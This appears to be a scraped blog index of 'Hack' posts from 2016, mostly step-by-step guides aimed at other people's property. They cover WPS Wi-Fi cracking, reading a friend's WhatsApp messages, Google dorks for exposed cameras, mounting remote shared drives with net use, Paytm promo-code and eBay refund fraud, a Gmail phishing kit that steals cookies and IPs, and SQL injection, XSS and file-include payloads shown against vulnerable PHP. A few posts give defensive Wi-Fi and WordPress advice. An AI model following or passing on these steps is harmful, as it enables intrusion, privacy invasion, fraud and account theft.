Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

15 February 2016

365daysmasti

HACK WiFi using WiFi Wps Wpa tester

HACK WiFi using WiFi Wps Wpa tester Want to take advantage of your neighbor’s super fast Wi-Fi connection? If they’re smart, they probably have it password protected (otherwise you wouldn’t be reading this, would you?). But if you have an Android phone, you can get back at them for always parking in your spot and slamming the door when they get home at 2 a.m.—by stealing…er, borrowing, their connection.

So Today i m posting how to hack WiFi password in less than 1 min with App Name WiFi Wps Wpa tester .

HACK WiFi using WiFi Wps Wpa tester : Just download and Install this app From Click Here. Make Sure You Have Enabled The Unknown Sources In Settings/ Open app and press refresh. Then the list of WiFi networks available will be shown. If you see a green Lock Icon click on it Press Try to Connect

Choose a Pin (Try all) also Try ‘VERBOSE’

In seconds a pop up will appear with the password

Enter the password and enjoy free WiFi. Done Enjoy.





Download

Read More

28 January 2016

365daysmasti

12 Best Android Hacking Apps


As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps. Apart from the normal mobile user, techie guys also like its flexible features that allows them to do various new task. As with this its security concerns also headed up. Recently we have noted that many of the cyber hackers are targeting Android users. There are many techie guys have also unrestricted the features that are restricted by its owners, Google. So I thing the below words are familiar to them but many of them have not been aware. Here I am discussing some of the Apps that are meant for the Security tester, Ethical hacker and for those guys who really explore the tech world.

Lets see Best Android Hacking Apps 2016 that are meant for hacking, hackers, security researchers;


#1 Hackode

Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

#2 Androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

#3 APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

#4 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

#5 Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.


#6 zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

#7 Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

#8 dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

#9 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. This app redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths.

#10 Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

#11 Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

#12 SSHDroid

Android Secure Shell: Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android. This application will let you to connect to your device from a PC and execute commands (like “terminal” and “adb shell”).

Note All content are intended for Security Research Purpose and should not be used illegaly.
Here to Download best android tools for hacking 2016, As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps.

Read More

21 January 2016

365daysmasti

Paytm Trick to Hack: Get Unlimited Money In Your Wallet For Free



Update: This trick sometimes work and sometime doesn’t. Although this trick closed long ago but some people are still using it. As reported it’s highly volatile.

Paytm Trick: Today I have come up with an amazing unlimited paytm trick with which you can avail unlimited money in your wallet. This is a special once in a lifetime paytm hack. And best thing about Paytm is that you can transfer your wallet balance straight to your bank account. This trick is for everyone and anyone so anybody can avail this amazing trick. With this paytm trick you will get Rs 25 everytime and unlimited number of time. I have outlined every possible steps below for easy understanding. So just follow the below steps to get unlimited money from Paytm app which is more than a wallet.


Benefits Of Unlimited Paytm Trick:

Just like Paytm has so many benefit, this trick also has amazing benefits which are listed below.
> Easy to follow
> Clear and detailed steps
> No investment required
> You can earn unlimited money
> Wallet balance can be transferred to your bank account.


Requirement For Unlimited Paytm Money trick:

> Android smartphone.
> PC with admin privileges.
> Bluestack, Paytm and BSTweaker app.
> Patience.

 

How to avail unlimited money from paytm app:

Now I am going to tell you the main steps which you have to follow to effectively utilize this paytm trick. Just follow them carefully and get huge bucks in your bank account.
> First and foremost step is to download the Paytm App from playstore.
> Run the app and create a new account for Paytm if you don’t have already.
> Now add money to the wallet by clicking on ‘+’ sign and enter the amount Rs 25.
> Now apply promocode FREE25 while completing the transaction.
> You will get Rs 25 in your wallet.
Note: It may take upto 24 hours for amount to be credited to your wallet.

> Now you need to install Bluestack in your PC so install it.
> Now run Bluestack using admin privileges.
> Install Paytm App from playstore in Bluestack.
> Now signup for paytm with new details. For verification purpose you will get OTP on your phone. Use that OTP to verify your newly created account.
> Now again add money to your wallet. Add Rs 25 to your wallet and apply promocode FREE25 and complete the transaction.
> You get the amount credited in your wallet shortly.
> Now run BSTweaker and change IMEI as well as android ID and again follow the above steps to earn Rs 25 in your wallet everytime.
Important: You can also use the promocode ADD50 which will provide Rs 50 in your wallet. This promocode doesn’t comes live often so it might not work all the time. But there’s no harm in trying.
By following the above tutorial you can earn unlimited money from Paytm trick in a multiple of Rs 25. You will get Rs 25 everytime you follow this trick. So follow this paytm trick unlimited times to earn unlimited money in your wallet which can be transferred to your bank. This was the paytm trick to get unlimited free wallet balance and below I have listed some of the amazing paytm cashback offers from the past which are trending throughout India.
Read More
365daysmasti

How To Hack Ebay Account

How To Hack Ebay Coupons



Ebay did not mention or define the ‘hack’, but the email to ‘buyers’ express regret to them for ‘interruption’ they have experienced in their ‘shopping’, Ebay is requiring all the users to reset or rejoin the passwords. The ‘eBay’ is an online ‘forum’, permit the ‘trade’ on local, national, & ‘international’ basis & it offers or provides an ‘online platform’ where millions of products are sell each day. It sells ‘everything’ from the ‘electronics’ to the topical clothes/outfits & shoes. You can advantage exciting ‘offers’, along with eBay ‘vouchers’. Go to the ‘eBay offers’ provided by the ‘store’ & select the one that fulfill your requirement. Once you choose a ‘eBay discount coupon’, copy its ‘code’ & use it during the ‘payment procedure’.
  • First, buy or purchase a product on eBay.
  • Then after receiving the product claim that ‘the product is not working’ or something else.
  • Now, eBay will call you & promise you a 110% coupon.
  • The seller will also send the other product as replacement.
  • You do not require sending back the first product or iteming, but be sure that the item/product is under ‘Rs. 1000’.

 

How To Hack Ebay Bidding

 

 The  ‘But it now’ feature that displays in some ‘bids’ permits a ‘bidder’ to bypass the ‘bidding’procedure & ‘end’ an ‘bid’ at some preset ‘price’. This option remains ‘visible’ on the ‘auction page’ until the first ‘bid’ is put/placed, after which it evaporates.
  • Begin with the explicit: In this, there may be a cause that an ‘auction’ has a low ‘buy it now’ price: you have to monitor that you read the ‘details of auction’ before you transact.
  • Incise the ‘Buy it now’ feature: in this, there is a ‘time’ that the ‘bidding’ won’t access any other ‘bids’, & you will finish winning the product with your ‘starting bid’.
  • Make a ‘deal’: You can determine a seller’s character before you write by ‘reading the bidding’ details. If the seller’s tone positive, then a deal can be make.

How To Hack Ebay Payment


The eBay has its own famous ‘digital payment’ & money transfer service, the ‘PayPal’ has been found to be helpless to a pointed web application exposure that could permit an attacker to take the ‘control over users’ PayPal account with just a single ‘click’, affecting/touching more than ‘157’ millions PayPal users. There are ‘three critical’ permeability’s in PayPal ‘website’ containing ‘cross site request forgery (CSRF)’, ‘auto-token-bypass’,’ resetting the security question’.
  • In ‘CSRF’: it is a method of ‘attacking’ a website in which an attacker require to assure the victim to click on ‘crafted HTML’ page that will make a ‘request’ to the helpless website on their part/behalf.
  • By utilizing PayPal ‘CSRF’ accomplished an attacker to secretly affiliate a new ‘secondary email ID’ to the victim’s account & also ‘reset’ the answers of the ‘security question’ from the ‘target account’.

 

How To Hack Ebay Feedback


In the term of ‘feedback’, eBay is clear about ‘stating’ that every user who gives feedback is‘responsible’ for his/her self words & that once posted then the feedback cannot be ‘retracted’.
  • In the ‘user’s profile page you can give a ‘positive’,’ negative’ likes, along with a ‘short comment’.
  • You can watch their ‘ratings’ on the ‘thread view’ & profile page, if you click on the ‘number’ it ‘pop-ups’ a window, which display everyone that has ‘rated’ them.
  • You cannot change or alter your ‘vote’ on someone after ‘submitting’ it.
  • It is a simple hack process, one ‘PHP file’, & editing a combination files & creating or editing about 6 or more ‘templates’.
Read More
365daysmasti

Android Mobile Hacking Tricks And Tips


 

Wifi Hacking Tricks For Android Mobile

 


Sometimes we do not know the password of our modem in order to connect on our mobile device. For this case, there is an excellent-application for android that will give us our password-modem easily. Wi-Fi password will handle everything semi-automatically & Wi-Fi password is available & works on almost any android-device, but it only requires that the version of android is 2.2, greater, or oversized. There are several-methods in order to hack the android mobile.
  • Hacking WPA-2 WPS-Routers: First you have to root your android-device or mobile then you have a broadcom bcm-4329 or 30 chipset,
  • Then download & install ‘bcmon’, it is necessary because it helps in order to monitor/control mode on your broadcom-chipset, which helps in Pin-cracking.
  • After installation, process just run the application & then taps the ‘monitor-mode’
  • Download and install the ‘reaver-app’ in order to helps to crack the ‘wps-pin’ to retrieve the wpa2 pass-phrase. After this, launch this app and do an on screen confirmation, which depicts that you are not using it for illegal purpose & then tap on the access-point you would wish tocrack and continue.
  • After this process verify the settings and you have to check’ automatic-advanced settings’ box.
  • At the final step, it will take two to 10hrs in order for the cracking of wps to be successful.

Bluetooth Hacking Tricks For Android


We know that ‘Bluetooth’ is a wireless technology that is used for exchanging the data like: music, video, audio, files over short-mileage or distance. Now the point is how the bluetooth hack an android mobile device. Here are some bluetooth hacking software’s and tools, which can help you to hack android phones.

  • Super-bluetooth-hack: – this s/w is used to reading and controlling the data/information of remote cell phone via ‘bluetooth’. Phone-lists & sms stored in the form of HTML- type. It also display or provide the information about the battery, SIM card, & network’s.
  • Blue-scanner:- this software find out or search-out the bluetooth enabled device & try to get the more information as possible for a newly discovered-device.
  • Blue-bugger: it courage the blue bug (implies the name of the set-of security holes of bluetooth) penetrability of a bluetooth-enabled device & the hacker access the phone book, call-list and other information of that cell phone.


Free Internet Hacking Tricks For Android




Internet tricks are a free & most searchable keyword in order to hack an android device. Some user’s demand that they want free 3G internet tricks for android mobile & pc. Therefore, in this way there are some free internet-hacking tricks for android-device or mobile.
  • Firstly, you have to download Droid-vpn-android-app from play store.
  • Then start the server, you got free 3G-internet with this trick.
  • Open-VPN is software programs, which can be utilized/operated in the form of, create the ‘Secured-virtual private-network’. This is mostly used for free-internet & all the network operators use this trick by VPN-configuration.
  • Download it & use it without any cost,
  • It support all the TCP & UDP-ports,
  • Request all the http and https requests.


Wifi Password Hacking Tricks For Android Mobile 


Wireless-fidelity hacker is an idealistic application that is used to emulate access to Wi-Fi networks. If you want to know the password of a network then this app is useful for you. By following few or some short steps, the app will reveal/express the password.
Features/highlights:
  • Wep, Wpa, Wpa-2 hacking capability.
  • Easy in order to run automated-scripts.

  • First choose the network you want to crack this can be done by selecting it from the list,
  • Now press the crack-button,
  • In the next screen, press the start to begin the hacking of the network.
  • Automated script will be run, included by the process-description.
  • Once you complete the hacking process then the password will declare.
Read More

15 January 2016

365daysmasti

HOW TO HACK YOUR FRIENDS WHATSAPP

Follow These Simple Steps-
1. Take friends mobile
2. Go to Micro sdcard>Whatsapp>Database
3. Select all the files from here and send it to your phone via bluetooth or Wifi
4. Backup you Whatsapp database files and replace these files in your mobile
5. Now open whatsapp and read your friends messages
Read More

10 January 2016

365daysmasti

View or Hack Unprotected Live Cameras Using Google

In this tutorial i will teach you to hack or view unprotected cam using a simple google trick. Using this trick you can see live view of streets in china or america. Inner view of some office and lot more. Lets dive into it.
How To View Unprotected Cam ?       
     1. Go to Google and search for "inurl:view/view.shtml" (without quote).
       2. Now open any of the link from the search result and enjoy.
       3. Below is the list of google dork you can use to see more cams.
List Of Google Dork
inurl:/view.shtmlintitle:”Live View / - AXIS” | inurl:view/view.shtml^inurl:ViewerFrame?Mode=inurl:ViewerFrame?Mode=Refreshinurl:axis-cgi/jpginurl:axis-cgi/mjpg (motion-JPEG)inurl:view/indexFrame.shtmlinurl:view/index.shtmlinurl:view/view.shtmlintitle:start inurl:cgistartintitle:”live view” intitle:axisliveappletintitle:snc-z20 inurl:home/intitle:liveappletintitle:”i-Catcher Console - Web Monitor”intitle:axis intitle:”video server”intitle:liveapplet inurl:LvApplintitle:”EvoCam” inurl:”webcam.html”intitle:”Live NetSnap Cam-Server feed”intitle:”Live View / - AXIS”intitle:”Live View / - AXIS 206W”intitle:”Live View / - AXIS 210″inurl:indexFrame.shtml Axisintitle:”Live View / - AXIS 206M”inurl:”MultiCameraFrame?Mode=Motion”allintitle:”Network Camera NetworkCamera”intitle:”WJ-NT104 Main Page”intext:”MOBOTIX M1″ intext:”Open Menu”intext:”MOBOTIX M10″ intext:”Open Menu”intext:”MOBOTIX D10″ intext:”Open Menu”intitle:”netcam live image”intitle:snc-cs3 inurl:home/intitle:snc-rz30 inurl:home/intitle:”sony network camera snc-p1″intitle:”sony network camera snc-m1″site:.viewnetcam.com -www.viewnetcam.comintitle:”Toshiba Network Camera” user login
Read More
365daysmasti

12 Simple Steps To Become A Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become ahacker, have a deeper look
1. Learn UNIX/LINUX
UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.
2. Code in C language 
C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.
3. Learn to code in more than one Programming Language
It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.
4. Learn Networking Concepts
Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.
5. Learn More Than One Operating Systems 
It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.
To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.
7. Learn more and more about hacking
Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.
8. Experiment A Lot
After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.
9. Write Vulnerability (Loop hole program)
Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.
10. Contribute To Open Source Security Projects
An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.
11. Continue never ending Learning 
Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems
12. Join Discussions and meet hackers 
Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.
Read More

7 January 2016

365daysmasti

How to Protect Wi-Fi network From Hackers




Do you use a wireless network like Wi-Fi at your home or office? And afraid of it getting hacked by other people (hackers)? Now a day hacking has become a key stress or tension for the peoples and are you one among them getting stressed? Then now you don’t need to get worried about it, and let me handle that stress and problem, you just have to do is go through this article and try the stated tips by your own and learn How to Protect Wi-Fi network.

HOW TO PROTECT WI-FI NETWORK


1.USE WPA:

Many of the WI-Fi connections provides WEP (Wired Equivalent Privacy) for protecting your wireless network, but now a day it can be easily broken/hacked by the hackers by using a simple hacking suite within no time. So to protect your wireless network to the fullest you can use WPA (Wi-Fi Protected Access), and in this you have to make sure that WPS (Wireless Protect Setup) is disabled in the router’s settings. This is the Most Basic and Important Tip to Protect your Wi-Fi Network

2.USE A STRONG & SECURE WPA PASSWORD

Always make sure that the password that you select for your wireless network is long and random so that it can’t be cracked/hacked by any kind of hacker. And to test how strong is your password you can use CloudCracker service.
In this service you will be asked some data and that you need to feed in (not the password), and then it will try identifying your password (it’s done in the same way the hacker tries to find out your password), if it fails to find your password then you are ready to use your wireless network and if it finds out your password then you have no other choice left other than changing your password.

3.SEPARATE NETWORK FOR GUESTS:

If you are indulged in a business which allows visitors to use your Wi-Fi then it is sensible that you offer a guest network. By doing this the visitors will be able to connect to the internet without getting access to your company’s internal network. This will effectively help you in protecting your company’s information and also from any kind of malware and virus affecting your network or system.

4.HIDE YOUR NETWORK NAME

Whenever you get connected with a wireless network first and the foremost thing you need to do is change its settings, as according to the default setting wireless network’s name is broadcasted to make it easy to find and connect. But Service set identifier (SSID) can also be set to “Hidden” so that no one except you will be allowed to view the name of your wireless network. Hence it Helps to Protect Wi-Fi Network.

CONCLUSIONS :

With the help of these easy tips you can easilyProtect Wi-Fi network From Hackers. Make sure that your firewall is turned on and you can also use antivirus and antispyware software from Microsoft Security Essentials or Windows Defender on which you can totally trust.
Read More

6 January 2016

365daysmasti

How to Protect Your WordPress Blog From Being Hacked

Plugins are one of the main attracting core to wordpress rather than Blogger.. It makes job easy for you..
I recommend Wordfence plugin for your safety. Here are some of its features.
*. Scans your core files against a reference copy which you maintain in your cloud servers.
*. Lets you see what has changed, how the file has changed and even repair it.
*. Scans your comments, posts and all files including core, themes, plugins and everything else under your WordPress root directory for malware, virus signatures, vulnerabilities
 and (very importantly) URL’s that are known to host malware or viruses.
*. Wordfence keeps known dangerous URL’s, including ALL URL’s that are on Googles’ safe browsing list, out of your comments, pages, posts and files. This is by far my favorite feature because it’s virtually gauranteed to keep you off the dreaded red-page-of-death-malware-listthat Chrome and Google use to ban sites.
*. Wordfence comes with a complete firewall that lets youset up rules based on the type of traffic and either throttle orblock offenders with an SEO safe 503 (come back later) HTTP message.
*. Another favorite feature of mine is that you can block fake Google crawlers. I actually added this after I tested Wordfence on this site because I couldn’t believe how many scrapers were pretending to be Googlebot. So now they are all instantly blocked.
*. Wordfence uses Google’s recommended reverse-forward DNS verification to sift the fake Googlebots from the real ones.
*. It includes login security against every form of brute force attack out there including abusing your lost-password form.
*. And what’s the point of having all this awesome security if you can’t see who is visiting, who’s getting blocked and what humans and robots are doing? So Wordfence includes real-time traffic that wait..for…it…
*. …Includes crawlers, scrapers, robots and all non-human traffic. Something you can’t get from Google Analytics or any other Javascript based analytics package.
*. I’ve even broken out Googlebot, other crawlers, 404 errors, humans and there’s an All Hits view.
*. And of course it includes commercial grade city-level geolocation which is another feature that comes from our cloud servers.
*. Wordfence is also built using much of the knowledge I’ve gained building Feedjit’s real-time analytics so it is careful to minimize any impact on network, website and mysql database performance and keep your website running super-fast..
Always stay upgraded to latest versions. Also don’t forget to Upgrade all your themes and plugins to their newest versions as well.
- Never use your username as“Admin / admin / user/ your name etc..” and passwords as “12345 / admin123/
Password must be from 8 – 16char + digit + special symbols , you can use various online sites for creating strict passwords..
Read More
365daysmasti

Hacking network Computer with cmd (commands)

Hi all members In this step by step tutorial you will learn about: How to Hack Network Computer using the command prompt.
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are three possible answers
A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156
The computer's name will be here
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.
Read More
365daysmasti

Secret Hack Codes for Apple Iphone 5, 5C, 5S, 6, 6 Plus


Hello Friends, today i am going to share several secret hack codes for Apple Iphone 5, 5C, 5S, 6 and 6 Plus. These iphone hack codes will help you to hack iphone mobiles and help you to explore more about your apple iPhone.
Secret Hack codes are those codes which are usually hidden from users for any misuse and exploit. As we all know Apple Iphone is very secured platform and thus very few hack codes of apple iphone are there on internet. Today i am sharing all the hack codes of apple iphone cellphones that i am aware of. And i surely hope you can’t find codes better than that. So friends let’s hack and explore our apple Iphone and tabs. I have tested these codes on my Apple Iphone 5S and friends iphone 6 plus. I am sure these will work on all previous apple iphones too.

Secret Hacking codes for Apple IPhone Mobile Phones:
1. Entering into Field Mode :  Field mode contains lots of iPhone inner settings, especially newest network and cell information.

*3001#12345#* and tap Call

2. IMEI Number : Shows your IMEI. No need to tap Call. IMEI is the unique identifier for your mobile phone hardware.

*#06#

3. Call Forward Settings and Insights : Set interrogation for call forwards. Discover the settings for your call forwarding. You’ll see whether you have voice, data, fax, SMS, sync, async, packet access, and pad access call forwarding enabled or disabled.

*#21# and tap Call

4. Calling Line Presentation : This shows whether you have enabled or disabled the presentation of the calling line, presumably the number of the party placing the call.

*#30# and tap Call

5. Call Waiting Settings : Determine if call waiting is enabled. Shows call waiting status for voice, data, fax, SMS, sync data, async data, packet access and pad access. Each item is either enabled or disabled.

*#43# and tap Call

6. Check all Unanswered Calls : Check the number for unanswered calls. Show the number for voice call forwarding when a call is unanswered. Also show the options for data, fax, SMS, sync, async, packet access and pad access.

*#61# and tap Call

7. Check the number for call forwarding if no service is available. Just like the previous, except for no-service rather than no-answer situations.

*#62# and tap Call

8. Check the number for call forwarding when the iPhone is busy. And again, but for when the iPhone is busy.

*#67# and tap Call

9. Call Control Bars : Check all the usual suspects ( voice, data, fax,SMS, etc ) to see whether barring is enabled or disabled for outgoing.

*#33# and tap Call

10. Disable Call Forwarding : This code disable all call Forwading.

##002#

11. Code to Hide your Number :

*#31#


That’s all guys. Some of them might be operator specific i.e. works for prepaid phones only. But all codes deserves and try. Check these codes and let us know what all works for you. Hope you guys enjoyed new set of secret hack codes.
Read More
365daysmasti

How to Hack Gmail Account password online



Hello friends, in my previous article about “How hack email account” i have explained all the possible ways to hack an email account. In my previous tutorial about phishingHow to hack gmail account or password” i have explained how to hack gmail account or password using phishing technique.  But now that phisher has been outdated and now most of free web hosting servers nowadays does not allow to create text file. So in this tutorial i have come up with latest Gmail Phisher and new free web hosting servers. So guys read on..


As i always start my tutorial with brief introduction about the topic, so let’s discuss again what actually is phishing.

What is Phishing?
Phishing in normal words is a word derived from the word fishing. As in fishing we make a trap for the fish to get caught similarly in case of Phishing we make a trap to hack the user password. Phish basically means fake, things that are deviating from original product. Technically Phishing is a technique to hack victims account password using the phish or fake pages. In phishing we sent the fake page links to the victim in spoofed manner so that we will not able to recognize that the page is real or fake. Now when victim enters his credentials in the fake page two different process occurs simultaneously. First it writes a log file having username and password and second process redirects the user to the original website page with username entered and displaying password is incorrect. 
How to recognize Phish Pages?
There are two ways to recognize the Phish pages and both depends on the awareness of the user. There are some other ways also to protect yourself from Phishing but as we Prevention is better that cure. If you know how its done then surely you will also know what are its loopholes and how can we detect it.
Ways to recognize Phish Page:
1. Check the Address bar, if the URL you are visiting does not match with the original website link then its a fake page.
2. If you are a great coder or understands HTML well then you can easily revert back the attack and check the hackers hacked log file. But if you by mistake entered your own details it cannot be deleted. For this you need to use IDM and run the website grabber. There in log file you can see all details of the accounts that hacker has hacked.
What’s new features in this Gmail phisher?
Since its a new phisher so friends there should be something new in it. Isn’t it. Yups, what do you think i have added in this phisher. 
I have added few awesome features in this phisher and list is below:
1. Incorrect password shown page bug removed
Previously what happens when user login using phisher it redirects to the original page and displays password is incorrect. But now it doesn’t show that but even do more smarter thing… As for phishing account we have to sent the email to victim, and now if victim has read the mail that means he is already login so what i have done i have utilized the cookie hack and result is guess what, when victim login using fake page he login’s in to his own original account without even showing any message or anything. Technically its called Tabnabbing another name of advanced Phishing.
2. Log File Contains more additional Information
I am sure you will love this information what more log file contains. Previously it only contains the username and password. Now log file contains all the cookie details along with IP address of the victim. And now why it becomes more significant. Previously what happens some good people means people that know phishing technique login’s through the Phish page but enters the wrong credentials and use some abusive words in login. Now when they type that also i will get their Magic cookie or simply called session cookie and IP address that i can use to hack their PC and account.


Steps to Hack Gmail Account Password Online:
1. Download the Gmail Phisher (Click here to Download).
2. Extract the rar file and now you will get three files namely:
  • Index.htm
  • Isoftdl_log.txt
  • next.php
3. Now go to Free Hosting website and register a new account on it.
4. After registering Go to File Manager on the website and Create a new directory name it as Gmail of whatever you want.
5. Now double Click on the directory to open it and click on Upload. Now browse the three different files one by one from three upload boxes and click on upload.

6. Now Open the Index.htm page and you will see your fake page which looks absolutely similar to Gmail original page.

7. You can directly send the above URL  to the victim but its quite detectable. So we need to spoof it. So that become little bit difficult for victim to recognize it. For that visit tk domain maker website(click here to visit).
This i have already explained in the previous article : Hack Gmail Account Step by Step

8. Now Send the Spoofed link in the mail to the victim as i have explained in the Post Hack Gmail Account Step by step.

9. Now when user login using the fake page the data in log file is written which will look like below:

10. That’s all friends now you have the user name password of the victim.

Read More

5 January 2016

365daysmasti

Website Hacking Tutorial for beginners

Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...
SQL Injection
SQL injection is the act of injection your own, custom-crafted SQL commands into a 
web-script so that you can manipulate the database any way you want. Some example usages of 
SQL injection: Bypass login verification, add new admin account, lift passwords, lift 
credit-card details, etc.; you can access anything that’s in the database.
Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:
php
$user = $_POST['u'];
$pass = $_POST['p'];
if (!isset($user) || !isset($pass)) {
echo(“<form method=post>
“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>
Basically what this code does, is take the username and password input, and takes the 
users’s IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably 
injectable. If it doesn’t display anything, it might be injectable, and if it is, you will 
be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not 
injectable.
The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since 
the code doesn’t filter our input, we can insert anything we want into the statement, and 
just let ourselves in. To do this, we would simply put “Administrator” in the username box, 
and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the 
database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND 
`password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the 
password requirement, because as we all know, the logic of “OR” only requires one question 
to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the 
‘comment out’ character for SQL which means it ignores everything after it, otherwise the 
last “‘” would ruin the syntax, and just cause the query to fail.
XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The 
primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, 
they can log into whatever site they stole your cookie from under your account (usually, 
and assuming you were logged in at the time.)
Example Vulnerable Code – search.php (PHP)
PHP Code:
php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “<font 
color=red>XSS</font>”. If the site is vulnerable to XSS, you will see something like this: 
XSS, else, it’s not vulnerable.
Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you 
don’t know what it is) by tricking them into clicking on a link pointed to 
“search.php?search=// “. This will output “You searched for // . There were no results 
found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern 
browsers do unless the setting is turned off, it will redirect them to abc.
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed 
and executed on the local server.
Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>
